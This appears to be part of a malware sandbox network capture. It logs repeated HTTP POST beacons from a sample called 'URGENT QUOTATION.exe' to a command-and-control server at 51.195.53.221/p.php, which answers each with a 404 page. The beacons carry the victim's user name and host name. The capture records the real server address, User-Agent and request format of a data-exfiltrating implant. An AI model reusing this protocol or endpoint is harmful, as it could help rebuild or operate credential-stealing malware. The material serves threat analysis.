Feb 22, 2021 19:55:27.275314093 CET	2407	IN	Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equ
Feb 22, 2021 19:55:27.275357962 CET	2408	IN	Data Raw: 20 23 32 39 33 41 34 41 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 61 20 7b 0d 0a 20 Data Ascii: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFFFF; } .additional-info-items { padding: 20px 0; min-height: 193px; } .contac
Feb 22, 2021 19:55:27.275397062 CET	2410	IN	Data Raw: 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 30 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 66 6f 6f 74 65 72 20 61 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f Data Ascii: margin: 60px 0; } footer a { text-decoration: none; } footer a img { border: 0; } .copyright { font-size: 10px; color: #3F4143;
Feb 22, 2021 19:55:27.275435925 CET	2411	IN	Data Raw: 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 0d 0a 20 Data Ascii: } .status-reason { display: inline; } } @media (min-width: 992px) { .additional-info { background-image: url(data:image/png;base64,iVBORw0
Feb 22, 2021 19:55:27.275479078 CET	2413	IN	Data Raw: 49 6b 66 44 74 62 79 43 41 54 67 74 48 42 37 6c 33 54 72 4b 55 47 32 79 57 4f 65 37 4f 32 4b 59 51 49 50 45 37 78 46 44 31 32 59 76 79 36 53 76 71 6f 4c 4f 4d 66 39 35 6b 2b 42 76 67 71 6f 67 43 46 43 78 32 32 4e 64 6c 74 4f 31 65 70 59 63 37 79 Data Ascii: IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP9Npqv0NKZkS7GuNRQig5pvaYQwdTztjRnCrr/l0b2UgO+wRtMiFCAzqpLL0So+hWmi61Nn3aqKGEzDfFrmEoKqcWSFDRONSrAU0iFYLrHU2RKB3q+HxDHT4JKEe2prhxY1aCS5lY+H
Feb 22, 2021 19:55:27.275520086 CET	2414	IN	Data Raw: 66 52 49 75 36 54 66 42 59 4c 51 6e 2f 4a 33 65 43 63 46 64 45 37 69 34 64 77 6d 48 63 6b 57 45 72 4a 73 6d 55 37 65 49 73 47 6e 4c 78 70 56 70 56 45 54 49 34 6b 56 4d 33 56 43 55 77 31 2b 58 64 52 50 52 61 4d 30 6b 36 34 6a 4c 31 4c 45 46 6b 42 Data Ascii: fRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/dZMxVKDkPCyWmbPJ/8uIQJ/XbiL8bNKvv0vWlLCb0fQjR9zuU1y+sSkjcqsgPAzCVGFWzPpYxJM9GAMXhGRinD85xkrCxEomEY7I7j/40IEvjWlJ7wDzjJZtmbCW/cChOPPtlICMGX
Feb 22, 2021 19:55:27.275563955 CET	2415	IN	Data Raw: 4b 48 76 68 43 42 69 35 6a 36 30 42 63 69 38 6f 65 2b 45 4b 45 50 72 59 6d 67 2b 51 4e 4e 4f 77 33 50 64 43 4c 67 70 42 55 52 4f 50 51 31 38 6d 58 31 5a 45 78 38 70 39 2f 2f 49 69 30 71 63 33 51 69 36 43 6d 41 55 31 64 45 70 44 39 53 41 31 74 54 Data Ascii: KHvhCBi5j60Bci8oe+EKEPrYmg+QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81kz8fEo5Na0rAQYU8KQEWEPSkAaafnRPiXEGHPCCbcnxphIEPPnhXc9XkRNuHh3Cw8JXteeCV7Zjg/wua8YGl3XvDUPy/c/Avd4/hNDSqegQAAA
Feb 22, 2021 19:55:27.275707960 CET	2416	IN	Data Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 67 2d 73 79 73 2f 73 65 72 76 Data Ascii: <li> <img src="/img-sys/server_misconfigured.png" class="info-image" /> <div class="info-heading"> 51.195.53.221/p.php (port 80

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49748	51.195.53.221	80	C:\Users\user\Desktop\URGENT QUOTATION.exe

Timestamp	kBytes transferred	Direction	Data
Feb 22, 2021 19:55:27.547796965 CET	2427	OUT	POST /p.php/594QbwaP456AN HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 51.195.53.221 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 244CE878 Content-Length: 163 Connection: close
Feb 22, 2021 19:55:27.593444109 CET	2431	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 33 00 38 00 35 00 37 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.rujones238576DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Feb 22, 2021 19:55:27.841558933 CET	2440	IN	HTTP/1.1 404 Not Found Date: Mon, 22 Feb 2021 18:55:28 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20 Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {
Feb 22, 2021 19:55:27.841588020 CET	2442	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b Data Ascii: color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFF
Feb 22, 2021 19:55:27.841613054 CET	2443	IN	Data Raw: 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d Data Ascii: } .info-server address { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; }
Feb 22, 2021 19:55:27.841635942 CET	2444	IN	Data Raw: 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 Data Ascii: -align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline; } }
Feb 22, 2021 19:55:27.841655970 CET	2446	IN	Data Raw: 31 4d 64 32 30 59 66 69 52 2b 55 46 66 76 64 49 69 7a 70 32 76 31 76 56 6a 74 30 75 73 61 31 70 6d 4e 7a 41 58 32 49 46 6c 35 2f 78 61 45 39 61 71 51 47 53 44 36 62 78 49 30 52 5a 53 77 33 75 75 46 30 59 6a 51 48 65 70 6a 4d 78 48 6d 64 39 49 67 Data Ascii: 1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP
Feb 22, 2021 19:55:27.841677904 CET	2447	IN	Data Raw: 75 4b 4c 30 52 49 51 38 44 7a 59 4f 4b 4a 75 39 38 56 30 30 36 4c 62 53 49 6b 76 42 73 52 6c 7a 42 50 59 6b 49 52 49 48 31 37 34 33 69 45 69 65 6c 42 54 34 69 51 52 6b 4e 48 77 55 51 4d 55 74 54 57 58 71 73 69 51 75 67 42 69 77 6c 37 33 4f 4f 72 Data Ascii: uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+BIPPVVLrbAVAulQKIwAO/9jUKyJk51SmO5wwhpHXac0E3EQEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/
Feb 22, 2021 19:55:27.841698885 CET	2449	IN	Data Raw: 70 31 36 54 53 43 4f 66 5a 70 70 4d 69 47 44 36 69 56 71 72 32 37 31 6f 56 6f 6b 55 36 41 4a 39 55 35 46 47 6e 58 49 77 77 35 6d 48 2b 6b 4c 45 68 78 49 31 63 6c 32 30 51 43 47 43 54 67 52 4d 41 2f 33 2b 46 32 6c 52 58 58 74 7a 58 68 55 52 50 54 Data Ascii: p16TSCOfZppMiGD6iVqr271oVokU6AJ9U5FGnXIww5mH+kLEhxI1cl20QCGCTgRMA/3+F2lRXXtzXhURPTTt9GQA6h+d/1dE5An9GRH5o5mwIgKHvhCBi5j60Bci8oe+EKEPrYmg+QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81
Feb 22, 2021 19:55:27.841717958 CET	2450	IN	Data Raw: 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 22 Data Ascii: <div class="container"> <div class="additional-info-items"> <ul> <li> <img src="/img-sys/server_misconfigured.png" class="info-image" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49749	51.195.53.221	80	C:\Users\user\Desktop\URGENT QUOTATION.exe

Timestamp	kBytes transferred	Direction	Data
Feb 22, 2021 19:55:28.064709902 CET	2450	OUT	POST /p.php/594QbwaP456AN HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 51.195.53.221 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 244CE878 Content-Length: 163 Connection: close
Feb 22, 2021 19:55:28.107758999 CET	2451	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 33 00 38 00 35 00 37 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.rujones238576DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Feb 22, 2021 19:55:28.371942997 CET	2451	IN	HTTP/1.1 404 Not Found Date: Mon, 22 Feb 2021 18:55:28 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8
Feb 22, 2021 19:55:28.371972084 CET	2452	IN	Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equ
Feb 22, 2021 19:55:28.371992111 CET	2454	IN	Data Raw: 20 23 32 39 33 41 34 41 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 61 20 7b 0d 0a 20 Data Ascii: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFFFF; } .additional-info-items { padding: 20px 0; min-height: 193px; } .contac
Feb 22, 2021 19:55:28.372010946 CET	2455	IN	Data Raw: 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 30 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 66 6f 6f 74 65 72 20 61 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f Data Ascii: margin: 60px 0; } footer a { text-decoration: none; } footer a img { border: 0; } .copyright { font-size: 10px; color: #3F4143;
Feb 22, 2021 19:55:28.372025967 CET	2456	IN	Data Raw: 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 0d 0a 20 Data Ascii: } .status-reason { display: inline; } } @media (min-width: 992px) { .additional-info { background-image: url(data:image/png;base64,iVBORw0
Feb 22, 2021 19:55:28.372042894 CET	2458	IN	Data Raw: 49 6b 66 44 74 62 79 43 41 54 67 74 48 42 37 6c 33 54 72 4b 55 47 32 79 57 4f 65 37 4f 32 4b 59 51 49 50 45 37 78 46 44 31 32 59 76 79 36 53 76 71 6f 4c 4f 4d 66 39 35 6b 2b 42 76 67 71 6f 67 43 46 43 78 32 32 4e 64 6c 74 4f 31 65 70 59 63 37 79 Data Ascii: IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP9Npqv0NKZkS7GuNRQig5pvaYQwdTztjRnCrr/l0b2UgO+wRtMiFCAzqpLL0So+hWmi61Nn3aqKGEzDfFrmEoKqcWSFDRONSrAU0iFYLrHU2RKB3q+HxDHT4JKEe2prhxY1aCS5lY+H
Feb 22, 2021 19:55:28.372057915 CET	2459	IN	Data Raw: 66 52 49 75 36 54 66 42 59 4c 51 6e 2f 4a 33 65 43 63 46 64 45 37 69 34 64 77 6d 48 63 6b 57 45 72 4a 73 6d 55 37 65 49 73 47 6e 4c 78 70 56 70 56 45 54 49 34 6b 56 4d 33 56 43 55 77 31 2b 58 64 52 50 52 61 4d 30 6b 36 34 6a 4c 31 4c 45 46 6b 42 Data Ascii: fRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/dZMxVKDkPCyWmbPJ/8uIQJ/XbiL8bNKvv0vWlLCb0fQjR9zuU1y+sSkjcqsgPAzCVGFWzPpYxJM9GAMXhGRinD85xkrCxEomEY7I7j/40IEvjWlJ7wDzjJZtmbCW/cChOPPtlICMGX
Feb 22, 2021 19:55:28.372075081 CET	2460	IN	Data Raw: 4b 48 76 68 43 42 69 35 6a 36 30 42 63 69 38 6f 65 2b 45 4b 45 50 72 59 6d 67 2b 51 4e 4e 4f 77 33 50 64 43 4c 67 70 42 55 52 4f 50 51 31 38 6d 58 31 5a 45 78 38 70 39 2f 2f 49 69 30 71 63 33 51 69 36 43 6d 41 55 31 64 45 70 44 39 53 41 31 74 54 Data Ascii: KHvhCBi5j60Bci8oe+EKEPrYmg+QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81kz8fEo5Na0rAQYU8KQEWEPSkAaafnRPiXEGHPCCbcnxphIEPPnhXc9XkRNuHh3Cw8JXteeCV7Zjg/wua8YGl3XvDUPy/c/Avd4/hNDSqegQAAA
Feb 22, 2021 19:55:28.372090101 CET	2461	IN	Data Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 67 2d 73 79 73 2f 73 65 72 76 Data Ascii: <li> <img src="/img-sys/server_misconfigured.png" class="info-image" /> <div class="info-heading"> 51.195.53.221/p.php (port 80

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49750	51.195.53.221	80	C:\Users\user\Desktop\URGENT QUOTATION.exe

Timestamp	kBytes transferred	Direction	Data
Feb 22, 2021 19:55:28.625081062 CET	2462	OUT	POST /p.php/594QbwaP456AN HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 51.195.53.221 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 244CE878 Content-Length: 163 Connection: close
Feb 22, 2021 19:55:28.668134928 CET	2462	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 33 00 38 00 35 00 37 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.rujones238576DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Feb 22, 2021 19:55:28.941349030 CET	2463	IN	HTTP/1.1 404 Not Found Date: Mon, 22 Feb 2021 18:55:29 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8
Feb 22, 2021 19:55:28.941373110 CET	2464	IN	Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equ
Feb 22, 2021 19:55:28.941406012 CET	2465	IN	Data Raw: 20 23 32 39 33 41 34 41 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 61 20 7b 0d 0a 20 Data Ascii: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFFFF; } .additional-info-items { padding: 20px 0; min-height: 193px; } .contac
Feb 22, 2021 19:55:28.941425085 CET	2467	IN	Data Raw: 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 30 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 66 6f 6f 74 65 72 20 61 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f Data Ascii: margin: 60px 0; } footer a { text-decoration: none; } footer a img { border: 0; } .copyright { font-size: 10px; color: #3F4143;
Feb 22, 2021 19:55:28.941446066 CET	2468	IN	Data Raw: 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 0d 0a 20 Data Ascii: } .status-reason { display: inline; } } @media (min-width: 992px) { .additional-info { background-image: url(data:image/png;base64,iVBORw0
Feb 22, 2021 19:55:28.941463947 CET	2469	IN	Data Raw: 49 6b 66 44 74 62 79 43 41 54 67 74 48 42 37 6c 33 54 72 4b 55 47 32 79 57 4f 65 37 4f 32 4b 59 51 49 50 45 37 78 46 44 31 32 59 76 79 36 53 76 71 6f 4c 4f 4d 66 39 35 6b 2b 42 76 67 71 6f 67 43 46 43 78 32 32 4e 64 6c 74 4f 31 65 70 59 63 37 79 Data Ascii: IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP9Npqv0NKZkS7GuNRQig5pvaYQwdTztjRnCrr/l0b2UgO+wRtMiFCAzqpLL0So+hWmi61Nn3aqKGEzDfFrmEoKqcWSFDRONSrAU0iFYLrHU2RKB3q+HxDHT4JKEe2prhxY1aCS5lY+H
